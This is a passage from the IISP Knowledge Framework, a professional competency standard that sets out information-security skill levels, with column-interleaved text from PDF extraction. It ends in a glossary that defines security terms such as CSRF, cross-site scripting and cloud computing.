between testing application functionality, code, of a typical scoping document.
vulnerability assessments and penetration testing. They shall be able to explain the structure and content
They shall be able to describe the main stages of a of a typical Remediation Action Plan.
test, e.g. scope, test, report, fix, re-test. They shall be able to describe the functionality of
They shall be able to name a few of the more common several testing tools and explain what type of tools
testing tools (e.g. nmap/Zenmap, Nessus, Metasploit, would be used in what situation.
Burp Suite).
IISP Knowledge Framework Version 1.0 August 2017 Page 128 of 195
Security Disciple Operational Security Management
Skill Area Secure Operations Ref: E1
Management
Establishes processes for maintaining the security of information throughout its existence including establishing
and maintaining Security Operating Procedures in accordance with security policies, standards and procedures.
Coordinates penetration and other testing on information processes.
Assesses and responds to new technical, physical, personnel or procedural vulnerabilities. Engages with the
Change Management process to ensure that vulnerabilities are mediated.
Manages the implementation of information security programmes, and co-ordinates security activities across
the organisation
Level 1 Level 2
Recognises the need for secure management of Understands and can explain the main processes for
Information Systems and can list some of the types of managing the security of information systems. This
incident which could occur is this is not done. might include experience of applying these concepts in
a training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to describe the potential for They shall be able to explain most of the security
security incidents if systems and processes are not operating procedures within an organisation and
managed securely. explain their purpose.
They shall be able to name several security operating They shall be able to explain what a typical security
procedures within an organisation and summarise operating procedure looks like.
their purpose. They shall be able to explain the common causes of
They shall be able to describe the process of reporting security incidents and how security operating
security incidents within an organisation. procedures help to mitigate these risks.
They shall be able to describe the purpose of patch They shall be able to explain the purpose of
management, change management and vulnerability management.
deployment/release management. They shall be able to explain the role of vulnerability
assessments and penetration testing in maintaining
the security of a system.
They shall be able to explain patch management,
change management and deployment/release
management processes.
IISP Knowledge Framework Version 1.0 August 2017 Page 129 of 195
Security Disciple Operational Security Management
Skill Area Secure Operations & Ref: E2
Service Delivery
Securely configures and maintains information, control and communications equipments in accordance with
relevant security policies, standards and guidelines. This includes the configuration of Information Security
devices (e.g. firewalls) and protective monitoring tools (e.g. SIEM).
Implements security policy (e.g. patching policies) and Security Operating Procedures in respect of system
and/or network management.
Undertakes routine technical vulnerability assessments.
Maintains security records and documentation in accordance with Security Operating Procedures.
Administers logical and physical user access rights.
Monitors processes for violations of relevant security policies (e.g. acceptable use, security, etc.).
Level 1 Level 2
Recognises the need for information systems and Can explain the main principles of secure configuration
services to be operated securely and can list some of of security components and devices, including firewalls
the main policies and practices involved in achieving and protective monitoring tools (e.g. SIEM). This might
this. include experience of applying these principles in a
training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to name who in an organisation They shall be able to list most of the standards in the
they should go to consult about secure configuration organisation for secure configuration of systems and
of various systems and devices. devices.
They shall be able to name a few of the more common They shall be able to explain the principles of secure
vulnerability assessment tools (e.g. nmap/Zenmap, configuration.
Nessus). They shall be able to explain the purpose and
They shall be able to describe what a typical principles of protective monitoring.
organisation’s patching policy would look like. They shall be able to explain the functionality of
They shall be able to describe what a typical several vulnerability assessment tools.
organisation’s antivirus signature update policy would They shall be able to explain an organisation’s
look like. patching policy.
They shall be able to recognise non-compliance of They shall be able to explain the antivirus signature
most security policies. update policy.
They shall be able to explain why non-compliance of a
particular security policy has occurred.
They shall able to explain the difference between
network routers, network switches and stateful
firewalls.
IISP Knowledge Framework Version 1.0 August 2017 Page 130 of 195
Security Disciple Incident Management, Investigation and Digital Forensics
Skill Area Intrusion Detection and Ref: F1
Analysis
Monitors network and system activity to identify potential intrusion or other anomalous behaviour. Analyses
the information and initiates an appropriate response, escalating as necessary.
Uses security analytics, including the outputs from intelligence analysis, predictive research and root cause
analysis in order to search for and detect potential breaches or identify recognised indicators and warnings.
Monitors, collates and filters external vulnerability reports for organisational relevance, ensuring that relevant
vulnerabilities are rectified through formal change processes.
Ensures that disclosure processes are put in place to restrict the knowledge of new vulnerabilities until
appropriate remediation or mitigation is available.
Produces warning material in a manner that is both timely and intelligible to the target audience(s).
Level 1 Level 2
Recognises the need for intrusion detection and Can explain the basic principles involved in monitoring
analysis to maintain Information Security and can network and system activity for anomalous behaviour
describe the difference between Intrusion prevention and how the results can be used. This might include
and intrusion detection. experience of applying these principles in a training or
academic environment, for example through
participation in syndicate exercises, undertaking
practical exercises, and/or passing a test or
examination.
They shall be able to explain a number of sources of
vulnerability reports relevant to an organisation.
They shall be able to list several sources of external They shall be able to interpret external vulnerability
vulnerability reports relevant to an organisation. reports and establish whether they are relevant to the
They shall be able to name who in an organisation organisation.
they should go to consult about a new vulnerability. They shall be able to explain the process for reporting
They shall be able to describe the process for a new vulnerability.
identifying, analysing and reporting potential They shall be able to explain how anomalous network
intrusions. or system activity could be detected using protective
They shall be able to describe protective monitoring. monitoring.
They shall be able to explain the process of creating
warning material and how it should be tailored for the
target audience.
They shall be able to explain the difference between
NIDS, NIPS, HIDS and HIPS.
IISP Knowledge Framework Version 1.0 August 2017 Page 131 of 195
Security Disciple Incident Management, Investigation and Digital Forensics
Skill Area Incident Management, Ref: F2
Incident Investigation and
Response
Engages with the overall organisation Incident Management process to ensure that Information Security
incidents are handled appropriately.
Defines and implements processes and procedures for detecting and investigating Information Security
incidents.
Establishes and maintains a Computer Security Emergency Response Team or similar to deal with Information
Security incidents.
Working within the legal constraints imposed by the jurisdictions in which an organisation operates, carries out
an investigation into a security incident using all relevant sources of information.
Assesses the need for Forensic activity, and coordinates the activities of specialist Forensic personnel within the
overall response activities, engaging with the relevant organisational processes to ensure that Forensic services
are deployed appropriately.
Provides a full Information Security investigation capability where third parties, managed service providers, etc.
are involved.
Co-ordinates the response to an Information Security incident.
Level 1 Level 2
Recognises the benefits of managing Information Can explain the basic principles of incident
Security incidents and can describe the basic principles management, investigation and response. Can explain
of incident management, investigation and response. how incident management can operate effectively,
benefiting the organisation.
Understands the need to preserve evidence to support
any investigation and can explain the basic principles
involved.
Can describe how incident management can operate They shall be able to explain in detail the incident
effectively, benefiting the organisation. reporting process.
Understands the need to preserve evidence to They shall be able to explain the processes,
support any investigation. procedures, methods, tools and techniques used to
They shall be able to describe what is meant by an conduct incident management activities within the
information security incident. organisation.
They shall be able to describe what is meant by an They shall be able to explain the processes,
information security investigation. procedures, methods, tools and techniques used to
They shall be able to describe potential business conduct investigations.
impacts of security incidents upon confidentiality, They shall be able to explain the role of digital
integrity, availability and reputation in their forensics in conducting investigations.
organisation.
They shall be able to describe the main stages of
incident management, e.g. e.g. identify, contain,
cleanse, recovery, close.
They shall be able to name who in their organisation
they should report to if a security incident occurs, e.g.
Computer Security Emergency Response Team.
IISP Knowledge Framework Version 1.0 August 2017 Page 132 of 195
Security Disciple Incident Management, Investigation and Digital Forensics
Skill Area Forensics Ref: F3
Secures the scene and captures evidence in accordance with legal guidelines and in the most effective manner
to minimise disruption to the business and maintaining evidential weight, using specialist equipments as
appropriate.
Analyses the evidence to identify breaches of policy, regulation or law, including the presence of malware.
Presents evidence as appropriate, acting as an expert witness if necessary.
Level 1 Level 2
Can describe the basic principles of digital forensics Can explain the basic principles of digital forensics,
and recognises the capability of forensics to support including the principles and processes surrounding
investigations. securing and analysing evidence. This might include
experience of applying these principles in a training or
academic environment, for example through
participation in syndicate exercises, undertaking
practical exercises, and/or passing a test or
examination.
They shall be able to describe what information can They shall be able to explain examples of information
be collected to support forensic examination. recoverable through forensics.
They shall be able to list possible sources of digital They shall be able to explain the term “Continuity of
forensic information. Evidence”.
They shall be able to describe the requirements to They shall be able to explain the processes,
preserve forensic evidence. procedures, methods, tools and techniques used to
They shall be able to name who in an organisation conduct forensic examinations.
they should go to arrange for a forensics examination. They shall be able to explain relevant legislation and
guidance, e.g. Data Protection Act (DPA), Regulation
of Investigatory Powers Act (RIPA).
They shall be able to explain the purpose of a
Forensics Readiness Plan.
IISP Knowledge Framework Version 1.0 August 2017 Page 133 of 195
Security Disciple Business Resilience
Skill Area Business Continuity and Ref: H1
Disaster Recovery
Planning
Contributes to defining the need for, and the development of, Business Continuity Management (BCM) and
Disaster Recovery (DR) Plans, Processes or Functions.
Level 1 Level 2
Recognises the importance of Business Continuity & Can explain and give examples of how Business
Disaster Recovery Planning to Information Security, Continuity and Disaster Recovery Planning contributes
and can list some of the potential consequences if to Information Security.
these aspects are not properly considered.
They shall be able to describe how business continuity They shall be able to explain why business continuity
planning contributes to information security and disaster recovery plans should be tested.
objectives. They shall be able to explain the: types of
They shall be able recognise the difference between IT/technology disaster scenarios that may impact an
business continuity and disaster recovery. organisation.
They shall be able to describe a number of different They shall be able to explain the different types of
business continuity threats to an organisation. disruptive events that may impact an organisation.
They shall be able to name the ISO standards relevant They shall be able to explain the structure and
to business continuity. (e.g. ISO 22301). contents of a typical business continuity policy and
They shall be able to describe the contents of a typical business continuity standard.
business continuity policy and business continuity
standard.
IISP Knowledge Framework Version 1.0 August 2017 Page 134 of 195
Security Disciple Business Resilience
Skill Area Business Continuity and Ref: H2
Disaster Recovery
Management
Contributes to the implementation, operation and maintenance of BC and DR Processes or Functions.
Level 1 Level 2
Recognises the importance of Business Continuity & Can explain and give examples of how Business
Disaster Recovery management to Information Continuity and Disaster Recovery management
Security, and can list some of the potential contributes to Information Security.
consequences if these aspects are not properly
considered.
They shall be able to describe the business continuity They shall be able to explain why business continuity
management lifecycle. and disaster recovery plans should be tested.
They shall be able recognise the difference between They shall be able to explain disaster recovery options
business continuity and disaster recovery. to meet the business needs to restore individual
They shall be able to name the ISO standards relevant IT/technology systems, services and assets.
to business continuity. They shall be able to explain the business continuity
management lifecycle.
They shall be able to explain the processes in a typical
business continuity plan.
IISP Knowledge Framework Version 1.0 August 2017 Page 135 of 195
Security Disciple Business Resilience
Skill Area Cyber Resilience Ref: H3
Contributes to the development and implementation processes to anticipate, recognise and defend against
changing Cyber and Information risk environments which threaten business stability, and the development and
implementation of plans to introduce an holistic culture of Information Security across an organisation aimed at
identifying and reacting promptly and effectively to incidents.
Level 1 Level 2
Can describe the principles and benefits of cyber Can explain and give examples of how Cyber Resilience
resilience. contributes to Information Security.
They shall be able to describe the different They shall be able to explain a wide number of
components of cyber resilience. potential cyber risks pertinent to their organisation.
They shall be able to describe a number of potential They shall be able to explain how the following areas
cyber risks pertinent to their organisation. contribute to making an organisation resilient against
cyber attacks:
• Threat Intelligence.
• Threat modelling.
• Various technical controls.
• Security Awareness.
• Business Continuity Management.
• Incident management.
IISP Knowledge Framework Version 1.0 August 2017 Page 136 of 195
Security Disciple Information Security Research
Skill Area Research Ref: I1
Conducts original investigation in order to gain knowledge and understanding relating to Information Security.
Defines research goals and generates original and worthwhile ideas in Information Security.
Writes or presents papers, either internally or externally, on the results of research.
Contributes to the development of the employing organisation’s Information Security research policy and
participates in or supervises the work of Information Security research functions.
Develops new or improved models or theories of Information Security.
Develops new cryptographic algorithms.
Level 1 Level 2
Recognises the different types of Information Security Can describe and give examples on how research has
research within own sector. improved information security.
Can name at least one significant research paper that Can explain the role of at least one significant
contributed to information security. research paper that contributed to information
Can name at least one significant research activity that security.
contributed to information security. Can explain at least one significant research activity
that contributed to information security.
IISP Knowledge Framework Version 1.0 August 2017 Page 137 of 195
Security Disciple Information Security Research
Skill Area Applied Research Ref: I2
Vulnerability Research and Discovery, leading to the development of exploits, reverse engineering and
researching mitigation bypasses.
Cryptographic research leading to the assessment of existing algorithms.
In the Information Security field, uses existing knowledge in experimental development to produce new or
substantially improved devices, products and processes.
Level 1 Level 2
Recognises the value of applied research in Understands the principles of applied research in
Information Security. Information Security and might have undertaken some
directed practical examples in a training environment.
Can list some examples of applied research in Can explain the principles and processes of conducting
information security applied research.
IISP Knowledge Framework Version 1.0 August 2017 Page 138 of 195
Security Disciple Management, Leadership, Business and Communications
Skill Area Management, Leadership Ref: J1
and Influence
Works effectively in teams, either as a member or leader.
Encourages and supports others to meet objectives and to develop as Information Security professionals.
Is a leader on Information Security issues, either locally or across an organisation.
Provides technical leadership in a professional field, either within an organisation or across an industry sector.
Level 1 Level 2
Works cooperatively and professionally with others. Has received recognised training in management
and/or leadership.
Recognises that others could be impacted by their Can explain why it is important to openly celebrate
own behaviour. success and recognise accomplishments.
Recognises that others many have different values Can explain why it is important to empower
and views and is sensitive to this. colleagues by giving them the information and
Recognises that it is important to encourage and authority needed to complete tasks.
support team spirit and morale, helping work to be Can explain why it is important to provide support and
enjoyable and stimulating for all feedback to encourage and develop colleagues
IISP Knowledge Framework Version 1.0 August 2017 Page 139 of 195
Security Disciple Management, Leadership, Business and Communications
Skill Area Business Skills Ref: J2
Understands local or corporate business aims and uses this knowledge to maximise the cost-effectiveness of
Information Security.
Contributes to the development of cost-effective corporate Information Security strategy; takes action to
achieve greater corporate efficiency in line with strategic aims.
Takes reasoned decisions on Information Security based on business aims and influences.
Level 1 Level 2
Understands local objectives and organisational aims Understands and supports organisational aims, and
and how own job supports them. any regulations and laws that govern own
organisation.
Works in a cost effective manner.
Recognises that they need to monitor progress against Can explain why it is important to work in a cost-
objectives. effective manner.
Recognises that they need to demonstrate a self- Can summarise the business skills they are required to
motivated attitude. possess:
• Delivering
• Managing Customer Relationships.
• Time management and planning.
• Effective decision making
IISP Knowledge Framework Version 1.0 August 2017 Page 140 of 195
Security Disciple Management, Leadership, Business and Communications
Skill Area Communication and Ref: J3
Knowledge Sharing
Communicates information clearly and in a manner relevant to the target audience.
Influences senior management.
Shares knowledge on Information Security.
Negotiates effectively on Information Security issues.
Level 1 Level 2
Understands and interprets instructions effectively. Has clear written and verbal communication skills.
Communicates effectively with colleagues. Shares information and knowledge with others.
Can describe the required skills in this area: Can explain different techniques and styles of sharing
• Accurate and clear communication. information (documents, slides, presentations, wikis
• Writing in clear plain English. etc.).
• Listen and learn effectively from others. Can explain why it is important to produce work to a
• Constructive criticism. high standard, with well-reasoned arguments and
• Importance of sharing information as necessary. clear conclusions.
Can explain why it is important to encourage and
make useful contributions to open debate or complex
discussions.
IISP Knowledge Framework Version 1.0 August 2017 Page 141 of 195
Security Disciple Contributions to the Information Security Profession and Professional
Development
Skill Area Contributions to the Ref: K1
Community
Undertakes activity to broaden awareness and knowledge of Information Security issues, including the risks
from social media use, in the wider community – e.g. moderating sessions at schools, community centres, etc.
Level 1 Level 2
Recognises the need to educate the community on N/A
Information Security issues.
IISP Knowledge Framework Version 1.0 August 2017 Page 142 of 195
Part 2
References
Part 2: References
IISP Knowledge Framework Version 1.0 August 2017 Page 143 of 195
4. Common Terms
The following table contains a number of common terms and abbreviations used in the IISP Knowledge
Framework. Wherever possible an authoritative source has been used to obtain the definition – which is
contained in the right hand column of the table.
As there are many sources for definitions it has been decided that the following priority will be used.
• ISO/IEC 27000 family.
• ISO Guide 73.
• Other ISO Standards.
• OWASP.
• NISTIR 7298.
• NIST Special Publication 800-145 - The NIST Definition of Cloud Computing.
• NIST Special Publication 800-146 - Cloud Computing Synopsis and Recommendations.
• Oxford English Dictionary.
Where an authoritative definition cannot be found from the above list IISP has provided a definition.
Term Definition Source
Acceptable Use An Acceptable Use Policy (AUP) is a set of rules applied by the
Policy owner of an information system, which restrict the ways in it may
be used and sets guidelines as to how it should be used. Typically
users sign-up and accept the AUP or their employment contracts
make it mandatory to conform.
Access Control Means to ensure that access to assets is authorized and restricted ISO/IEC 27000:2016
based on business and security requirements.
Access Control A list of permissions attached to an object. It specifies which users
List or system processes (i.e. subjects) are granted access to objects, as
well as what operations are allowed on given objects.
Access Access management is the process of granting authorised users the
Management right to use a service, while preventing access to non-authorised
users. Access management can also be referred to as rights
management.
Accountability The security goal that generates the requirement for actions of an NISTIR 7298
entity to be traced uniquely to that entity. This supports non-
repudiation, deterrence, fault isolation, intrusion detection and
prevention, and after-action recovery and legal action.
Advanced A targeted attack against a specific entity that tries to avoid
Persistent detection and steal information over a period of time. Usually, the
Threat attacker behind the APT will use several pieces of malware and
security technologies to build up an attack.
Adware Adware refers to any piece of software or application that displays
advertisements, usually through pop-up or pop-under windows.
While they may be disruptive to some users, adware are not
inherently malicious.
Alert “Instant” indication that an information system and network may be ISO/IEC 27033-1:2009
under attack, or in danger because of accident, failure or human
error.
Algorithm A process or set of rules to be followed in calculations or other Oxford English
problem-solving operations. Dictionary
Antivirus A program that will prevent, detect and remediate certain types of
Software malware infection on individual computing devices and IT systems.
IISP Knowledge Framework Version 1.0 August 2017 Page 144 of 195
Term Definition Source
Anything as a Anything as a Service (XaaS) is a collective term used to refer to "X
Service as a service” where “X” stands for the service being offered, for
example ransomware!
Application Application control blocks or restricts unauthorised applications
Control from executing and hence only permits those that are approved to
execute. Also known as application whitelisting.
Application A type of firewall that follows and understands the application
Firewall protocols traversing it and can deny/allow traffic based on the
inspection of the application protocol.
Asset A useful or valuable thing or person Oxford English
Dictionary
A major application, general support system, high impact program, NISTIR 7298
physical plant, mission critical system, personnel, equipment, or a
logically related group of systems.
Assurance A positive declaration intended to give confidence; a promise. Oxford English
Dictionary
IISP Knowledge Framework Version 1.0 August 2017 Page 145 of 195
Term Definition Source
Authorisation Authorization is the process of determining whether an OWASP
authenticated subject (a user) can see, change, delete or take other
actions upon data. For example, if you log into a time keeping
application, submit your timesheet and then your boss approves it,
the act of logging in is authenticating, the act of filling out your
timesheet and submitting should only be something your user is
authorized to do and approving the timesheet is something only the
boss is authorized to do.
Availability Property of being accessible and usable upon demand by an ISO/IEC 27000:2016
authorized entity.
Backdoor Malicious code inserted into a program for the purposes of OWASP
providing the author covert access to machines running the
program.
Big Data Data sets that are so large or complex that traditional data
processing applications are inadequate to deal with.
Biometrics The application of statistical analysis to biological data. Oxford English
Dictionary
Black Box Black box testing is when the information about the organisation is
Testing not available to the testers. The tester performs the attack with no
prior knowledge of the infrastructure, defence mechanisms and
communication channels of the target organisation.
Blacklist A list of people or groups seen as unacceptable or untrustworthy. Oxford English
Dictionary
Bot Small, hidden programs that are often controlled by a malicious
hacker. Bots can be installed on your PC without you knowing. Bots
on a large number of PCs can be connected to form a botnet.
Also known as a web bot.
Botnet When multiple copies of a bot are installed on many PCs and
controlled by a malicious hacker. The malicious hacker can use a
botnet for large attacks (such as DDoS attacks or " floods") that
wouldn't be possible if they used just one PC.
Bring Your Own Bring Your Own Device (BYOD) refers to the policy of permitting
Device employees to bring personally owned devices (for example laptops,
tablets, and smart phones) to their workplace, and to use those
devices to access privileged company information and applications.
This includes using the devices when working remotely
Brute Force An attack on an encryption algorithm where the encryption key for OWASP
Attack a ciphertext is determined by trying to decrypt with every key until
valid plaintext is obtained.
IISP Knowledge Framework Version 1.0 August 2017 Page 146 of 195
Term Definition Source
Business Strategic and tactical capability of the organisation to plan for and ISO 22313:2012
Continuity respond to incidents and business disruptions in order to continue
business operations at an acceptable predefined level.
Business Holistic management process that identifies potential threats to an ISO 22313:2012
Continuity organization and the impacts to business operations of those
Management threats, if realized, might cause, and which provides a framework
for building organizational resilience with the capability for an
effective response that safeguards the interests of its key
stakeholders, reputation, brand and value-creating activities
Business Documented procedures that guide organizations to respond, ISO 22313:2012
Continuity Plan recover, resume, and restore to a pre-defined level of operation
following disruption.
Business Impact The business impact upon the organisation that might result from ISO/IEC 27005:2011
possible or actual information security incidents should be assessed,
taking into account the consequences of a breach of information
security such as loss of confidentiality, integrity or availability of the
assets.
Business Impact Business Impact Analysis (BIA) is a systematic process to determine
Analysis and evaluate the potential effects of an interruption to critical
business operations. Also referred to as a Business Impact
Assessment.
CAPTCHA. Completely Automated Public Touring test to tell Computers and
Humans Apart (CAPTCHA). A type of challenge‐response test
intended to distinguish human from machine input. An example is
the site request for web site users to recognise and type a phrase
posted using various challenging‐to‐read fonts, including images of
text strings.
Cardholder At a minimum, cardholder data consists of the full PAN. Cardholder PCI DSS
Data data may also appear in the form of the full PAN plus any of the
following: cardholder name, expiration date and/or service code
See Sensitive Authentication Data for additional data elements that
may be transmitted or processed (but not stored) as part of a
payment transaction.
Center for The Center for Internet Security (CIS) is an organisation dedicated to
Internet enhancing the cybersecurity readiness and response among public
Security and private sector entities. Utilizing its strong industry and
government partnerships, CIS combats evolving cybersecurity
challenges on a global scale and helps organisations adopt key best
practices to achieve immediate and effective defences against cyber
attacks. CIS is home to the Multi-State Information Sharing and
Analysis Center (MS-ISAC), CIS Security Benchmarks, and CIS Critical
Security Controls.
CERT Computer emergency response teams (CERT) are expert groups that
handle computer security incidents. Many CERT teams send out
alerts to customers. Alternative names for such groups include
computer emergency readiness team and computer security
incident response team (CSIRT).
Certificate An arrangement between a number of countries to ensure that
Authorizing evaluation of products against the Common Criteria are performed
Schemes to high and consistent standards and are seen to contribute
significantly to confidence in the security of those products.
Certification Authority trusted by one or more users to create and assign public ISO/IEC 27033-1:2009
Authority key certificates.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 147 of 195
Term Definition Source
CESG Assisted CAPS (CESG Assisted Products Service). A scheme run by NCSC
Products certifying high grade cryptography products protecting the most
Service sensitive information of HMG. The scheme is also used by NCSC to
accelerate the development of high-grade products.
CESG Tailored CESG Tailored Assurance Service (CTAS) primary purpose is to
Assurance provide a tailored approach to gaining assurance in the specific
Service implementation of a product, system or service that a particular
HMG organisation wishes to use.
Chain of See Continuity of Evidence
Custody
Change Change Management (CM) sometimes referred to as Change
Management Control) is a formal process used to ensure that changes to a
product or system are introduced in a controlled and coordinated
manner. It reduces the possibility that unnecessary changes will be
introduced to a system without detailed consideration, introducing
faults into the system or undoing changes made by other users of
software and potentially having unintended consequences
CHECK Scheme The CHECK scheme enables penetration testing by NCSC approved
companies, employing penetration testing personnel qualified to
assess IT systems for HMG and other public sector bodies.
This can only be mandated for HMG national security requirements.
Chief The Chief Information Security Officer (CISO) is the senior-level
Information executive within an organisation responsible for establishing and
Security Officer maintaining the enterprise vision, strategy, and program to ensure
information assets and technologies are adequately protected.
Cipher An algorithm for performing encryption or decryption
Cipher Suite The collection of cryptographic algorithms used in TLS and SSL.
Ciphertext Data in its encrypted form. NIST SP 800-175A
Cloud Access A software tool or service, that is either on-premises or cloud-
Security Broker hosted which sits between an organisation's premises infrastructure
and a Cloud Provider's infrastructure. A CASB acts as a control point,
allowing the organisation to extend the reach of their security
policies beyond their own infrastructure. It provides compliance
checking, threat protection, and security for cloud services. Also
known as Cloud Security Gateway.
Cloud Auditor A party that can conduct independent assessment of cloud services, NIST_SP_500_292
information system operations, performance and security of the
cloud implementation.
Cloud Broker An entity that manages the use, performance and delivery of cloud NIST_SP_500_292
services, and negotiates relationships between Cloud Providers and
Cloud Consumers.
Cloud Carrier An intermediary that provides connectivity and transport of cloud NIST_SP_500_292
services from Cloud Providers to Cloud Consumers.
IISP Knowledge Framework Version 1.0 August 2017 Page 148 of 195
Term Definition Source
Cloud A model for enabling on-demand network access to a shared pool of NISTIR 7298
Computing configurable IT capabilities/ resources (e.g., networks, servers,
storage, applications, and services) that can be rapidly provisioned
and released with minimal management effort or service provider
interaction. It allows users to access technology-based services from
the network cloud without knowledge of, expertise with, or control
over the technology infrastructure that supports them. This cloud
model is composed of five essential characteristics (on-demand self-
service, ubiquitous network access, location independent resource
pooling, rapid elasticity, and measured service); three service
delivery models (Cloud Software as a Service [SaaS], Cloud Platform
as a Service [PaaS], and Cloud Infrastructure as a Service [IaaS]); and
four models for enterprise access (Private cloud, Community cloud,
Public cloud, and Hybrid cloud).
Note: Both the user's data and essential security services may reside
in and be managed within the network cloud.
Cloud A person or organization that maintains a business relationship NIST_SP_500_292
Consumer with, and uses service from, Cloud Providers.
Cloud Provider A person, organization, or entity responsible for making a service NIST_SP_500_292
available to interested parties.
Cloud Security A not-for-profit organisation with a mission to “promote the use of
Alliance best practices for providing security assurance within Cloud
Computing, and to provide education on the uses of Cloud
Computing to help secure all other forms of computing”
Cloud See Cloud Consumer. An entity that consumes services provided by
Subscriber a Cloud Provider. Usually just referred as a Subscriber
COBIT A good-practice framework created by ISACA for IT management
and IT governance. COBIT provides an implementable set of controls
over information technology and organises them around a logical
framework of IT-related processes.
Code Auditing Reviewing computer software for security problems OWASP
Code Injection The general term for attack types which consist of injecting code
that is then interpreted or executed by the application. This type of
attack exploits poor handling of untrusted data. These types of
attacks are usually made possible due to a lack of proper
input/output data validation.
Commercial Commercial Product Assurance (CPA) is a NCSC approach to gaining
Product confidence in the security of commercial products targeted at the
Assurance HMG market. CPA products are also recognised within the EU and
NATO.
Common The Common Criteria for Information Technology Security
Criteria Evaluation (abbreviated as Common Criteria or CC) is an
international standard (ISO/IEC 15408) for computer security
certification. For products and systems one can specify the security
functional and assurance requirements through the use of
Protection Profiles.
Common Common Vulnerabilities and Exposures (CVE) is a dictionary of
Vulnerabilities publicly known information security vulnerabilities and exposures.
and Exposures CVE and the CVE logo are registered trademarks of The MITRE
Corporation.
Common The Common Vulnerability Scoring System (CVSS) is an open
Vulnerability framework for communicating the characteristics and severity of
Scoring System software vulnerabilities.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 149 of 195
Term Definition Source
Common Common Weakness Enumeration (CWE) is a software community
Weakness project that aims at creating a catalogue of software weaknesses
Enumeration and vulnerabilities. The goal of the project is to better understand
flaws in software and to create automated tools that can be used to
identify, fix, and prevent those flaws.
Communication In the internet protocol suite, a port is an endpoint of
Port communication in an operating system. It identifies a specific
process or a type of network service. A port is always associated
with an IP address of a host and the protocol type of the
communication, for instance port 80 is HTTP and port 443 is HTTPS.
Communications “communications data” means any of the following— Regulation of
Data (a) any traffic data comprised in or attached to a communication Investigatory Powers
(whether by the sender or otherwise) for the purposes of any postal Act
service or telecommunication system by means of which it is being
or may be transmitted;
(b) any information which includes none of the contents of a
communication (apart from any information falling within
paragraph (a)) and is about the use made by any person—
(i) of any postal service or telecommunications service; or (ii) in
connection with the provision to or use by any person of any
telecommunications service, of any part of a telecommunication
system;
(c) any information not falling within paragraph (a) or (b) that is held
or obtained, in relation to persons to whom he provides the service,
by a person providing a postal service or telecommunications
service.
Community The cloud infrastructure is provisioned for exclusive use by a specific NIST_SP_800_145
Cloud community of consumers from organizations that have shared
concerns (e.g., mission, security requirements, policy, and
compliance considerations). It may be owned, managed, and
operated by one or more of the organizations in the community, a
third party, or some combination of them, and it may exist on or off
premises.
Companies Act The Companies Act 2006 is an Act of the Parliament of the United
Kingdom which forms the primary source of UK company law.
Compartmental Separating a system into parts with distinct boundaries, using OWASP
ise simple, well- defined interfaces. The basic idea is that of
containment — i.e., if one part is compromised, perhaps the extent
of the damage can be limited.
A Security Design Principle.
Compliance A comprehensive review of an organisation's adherence to
Audit regulatory guidelines. Independent accounting, security or IT
consultants evaluate the strength and thoroughness of compliance
preparations. Auditors review security polices, user access controls
and risk management procedures over the course of a compliance
audit.
Compliance Ensuring that security controls required by legislation, directives,
Monitoring policies, regulations, standards or procedures are implemented.
Computer The Computer Misuse Act (1990) is designed to protect computers
Misuse Act against malicious attacks and theft of information. It is an Act of the
Parliament of the United Kingdom. Offences under the Act include
hacking, unauthorised access to computer systems and purposefully
spreading malware.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 150 of 195
Term Definition Source
Computer Team of appropriately skilled and trusted members of the ISO/IEC 27035-1:2016
Security organization that handles incidents during their lifecycle.
Incident
Response Team A CSIRT is also known as a CERT.
Confidentiality Property that information is not made available or disclosed to ISO/IEC 27000:2016
unauthorized individuals, entities, or processes.
Consequence Outcome of an event affecting objectives. ISO/IEC 27000:2016
Content Control Controls used to block content entering or leaving an organisation
where that content does not conform to the corporate policy.
Continuity of The witnessed, written record of all of the individuals who maintain
Evidence unbroken control over items of physical or electronic evidence. It
establishes the proof that the items of evidence collected at the
crime scene is the same evidence that is being presented in a court
of law. Also referred to as Chain of Custody or Chain of Evidence.
Control A measure that is modifying risk. Security controls are also referred ISO Guide 73:2009
to as safeguards or countermeasures. Controls include any process,
policy, device, practice, or other actions which modify risk. Controls
may not always exert the intended or assumed modifying effect.
IISP Knowledge Framework Version 1.0 August 2017 Page 151 of 195
Term Definition Source
Cross-site CSRF is an attack which forces an end user to execute unwanted OWASP
Request actions on a web application in which he/she is currently
Forgery authenticated. With little help of social engineering (like sending a
link via email/chat), an attacker may force the users of a web
application to execute actions of the attackers choosing. A
successful CSRF exploit can compromise end user data and
operation in case of normal user. If the targeted end user is the
administrator account, this can compromise the entire web
application.
Cross-site A class of problems resulting from insufficient input validation OWASP
Scripting where one user can add content to a web site that can be malicious
when viewed by other users to the web site. For example, one
might post to a message board that accepts arbitrary HTML and
include a malicious code item.
A type of code injection attack.
Cryptanalysis The study of ciphers, ciphertext, or cryptosystems with a view to
finding weaknesses in them that will permit retrieval of the plaintext
from the ciphertext, without necessarily knowing the key or the
algorithm.
Cryptographic A well-defined computational procedure that takes variable inputs, NIST SP 800-175B
Algorithm including a cryptographic key (if applicable), and produces an
output.
Cryptographic A function that maps a bit string of arbitrary length to a fixed-length NIST SP 800-175B
Hash Function bit string. Approved hash functions satisfy the following properties:
1. (One-way) It is computationally infeasible to find any input that
maps to any pre-specified output, and
2. (Collision resistant) It is computationally infeasible to find any two
distinct inputs that map to the same output.
